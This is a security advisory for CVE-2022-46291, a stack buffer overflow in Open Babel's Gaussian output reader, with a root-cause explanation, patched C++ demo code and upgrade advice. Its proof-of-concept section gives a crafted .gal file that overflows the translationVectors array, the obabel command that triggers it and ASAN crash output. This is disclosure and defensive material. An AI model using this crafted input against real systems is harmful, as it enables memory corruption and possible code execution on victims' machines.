CVE-2022-46291: Open Babel Gaussian Parser Stack Buffer Overflow via translationVectors
A crafted Gaussian output file can write past the end of a 3-element stack array in Open Babel's chemistry file parser, potentially giving an attacker arbitrary code execution.
The problem
Open Babel's Gaussian output reader in `gaussformat.cpp` declares a fixed-size stack array `vector3 translationVectors[3]` and an integer counter `numTranslationVectors = 0`.
When the parser encounters a `PeriodicType` line, it enters a `while` loop that reads subsequent lines and writes each one into the array, incrementing the counter with no upper-bound check. An attacker who supplies more than three translation-vector lines pushes writes beyond the array, corrupting adjacent stack memory.
The write lands in `vector3::Set()` with fully attacker-controlled x, y, z double values, making this a high-quality stack corruption primitive. CVSS 7.8 (local, no privileges required).
Proof of concept
A working proof-of-concept for CVE-2022-46291 in openbabel, with the exact payload below.
# Minimal malicious Gaussian output file (.gal)
# Triggers the OOB write: 4+ PeriodicType vector lines
# exceed the translationVectors[3] stack array bound.
Entering Link 1 = /fake/l1.exe
#p hf/sto-3g
Fake molecule
Standard orientation:
---------------------------------------------------------------------
Center Atomic Atomic Coordinates (Angstroms)
Number Number Type X Y Z
---------------------------------------------------------------------
1 6 0 0.000000 0.000000 0.000000
---------------------------------------------------------------------
PeriodicType 100
1 2 3 1.000000 2.000000 3.000000
1 2 3 4.000000 5.000000 6.000000
1 2 3 7.000000 8.000000 9.000000
1 2 3 1.100000 2.200000 3.300000
1 2 3 4.400000 5.500000 6.600000
1 2 3 7.700000 8.800000 9.900000
# Trigger:
# $ obabel -i gal malicious.gal -o sdf
# => ASAN: stack-buffer-overflow WRITE of size 8
# in GaussianOutputFormat::ReadMolecule (gaussformat.cpp:635)

The root cause (CWE-787) is the missing bounds check on `numTranslationVectors` before indexing into `translationVectors[numTranslationVectors++]`. The loop exits only when EOF is reached or a line has fewer than 6 tokens, so an attacker can keep supplying 6-token lines indefinitely.
Each overflowing write calls `vector3::Set(x, y, z)` with values parsed directly from attacker-supplied tokens via `atof()`, giving full control over the written doubles. Depending on the stack layout and compiler, this can overwrite saved frame pointers or return addresses.
The patch (commit 40e85213) adds a guard `if (numTranslationVectors < 3)` (or equivalent) before the write, breaking the unbounded loop as soon as the array is full.
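To make the loop shape and the guard concrete, here is an added example that is not Open Babel's code: a minimal stand-in for the `PeriodicType` loop described above, operating on in-memory text, with the bounds check applied before every write into the 3-element array. The names `Vec3`, `PeriodicBlock` and `parsePeriodicType` and the two sample inputs are assumptions constructed for this demonstration; only the array size, the counter, the 6-token loop condition and the `atof()` parsing follow the advisory.

```cpp
// Added example, not Open Babel's code: a minimal stand-in for the
// PeriodicType loop in gaussformat.cpp with the bounds check the fix adds.
// Vec3, PeriodicBlock and parsePeriodicType are names assumed for this demo.
#include <array>
#include <cstdio>
#include <cstdlib>
#include <sstream>
#include <string>
#include <vector>

struct Vec3 {
    double x = 0.0, y = 0.0, z = 0.0;
    void Set(double nx, double ny, double nz) { x = nx; y = ny; z = nz; }
};

struct PeriodicBlock {
    std::array<Vec3, 3> translationVectors{};  // fixed size, as in the reader
    int numTranslationVectors = 0;
    bool overflowRejected = false;  // set when a 4th vector line is refused
};

// Whitespace tokenizer standing in for the reader's line tokenizer.
static std::vector<std::string> tokenize(const std::string& line) {
    std::istringstream in(line);
    std::vector<std::string> toks;
    for (std::string t; in >> t;) toks.push_back(t);
    return toks;
}

// Parse the PeriodicType section of Gaussian-style output held in memory.
PeriodicBlock parsePeriodicType(const std::string& text) {
    PeriodicBlock pb;
    std::istringstream in(text);
    std::string line;
    while (std::getline(in, line)) {
        if (line.find("PeriodicType") == std::string::npos) continue;
        // Same loop shape as the vulnerable reader: consume lines while they
        // carry at least 6 tokens; x, y, z are tokens 3..5 parsed with atof().
        while (std::getline(in, line)) {
            std::vector<std::string> toks = tokenize(line);
            if (toks.size() < 6) break;
            // The fix: never index past the 3-element array. Without this
            // check the next line would store vector #4 beyond the array.
            if (pb.numTranslationVectors >= 3) {
                pb.overflowRejected = true;
                break;
            }
            pb.translationVectors[pb.numTranslationVectors++].Set(
                std::atof(toks[3].c_str()),
                std::atof(toks[4].c_str()),
                std::atof(toks[5].c_str()));
        }
        break;  // one PeriodicType block is enough for this demo
    }
    return pb;
}

// Constructed inputs (not real Gaussian output): a benign three-vector block
// and a six-vector block shaped like the advisory's PoC.
const std::string kThreeVectorInput =
    "PeriodicType 100\n"
    "1 2 3 1.000000 2.000000 3.000000\n"
    "1 2 3 4.000000 5.000000 6.000000\n"
    "1 2 3 7.000000 8.000000 9.000000\n"
    "Normal termination\n";

const std::string kSixVectorInput =
    "PeriodicType 100\n"
    "1 2 3 1.000000 2.000000 3.000000\n"
    "1 2 3 4.000000 5.000000 6.000000\n"
    "1 2 3 7.000000 8.000000 9.000000\n"
    "1 2 3 1.100000 2.200000 3.300000\n"
    "1 2 3 4.400000 5.500000 6.600000\n"
    "1 2 3 7.700000 8.800000 9.900000\n";

int main() {
    PeriodicBlock pb = parsePeriodicType(kSixVectorInput);
    std::printf("stored %d vectors, overflow rejected: %s\n",
                pb.numTranslationVectors, pb.overflowRejected ? "yes" : "no");
    return 0;
}
```

With the guard in place the six-vector input stores exactly three vectors and the fourth 6-token line is refused instead of written, which is the behaviour the patch restores; the check sits before the increment, so the counter can never reach an index the array does not have.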
The fix
Upgrade to Open Babel 3.2.0 (released 2026-05-26), which includes commit 40e85213 adding the missing array-bounds check before every `translationVectors[numTranslationVectors++]` write in the Gaussian, MSI, MOPAC, and MOPAC-IN readers. No workaround exists for older versions other than refusing to parse untrusted `.gal` / `.g09` / `.g16` files.
Reported by Cisco Talos Intelligence Group.
Related research
- CVE-2022-43467 (high, CVSS 7.8): Open Babel PQS Parser Out-of-Bounds Write
- CVE-2022-43607 (high, CVSS 7.8): Open Babel MOL2 Parser Stack Buffer Overflow
- CVE-2022-46293 (high, CVSS 7.8): Open Babel MOPAC Output Parser Stack Buffer Overflow
- CVE-2022-46294 (high, CVSS 7.8): Open Babel MOPAC Cartesian Out-of-Bounds Write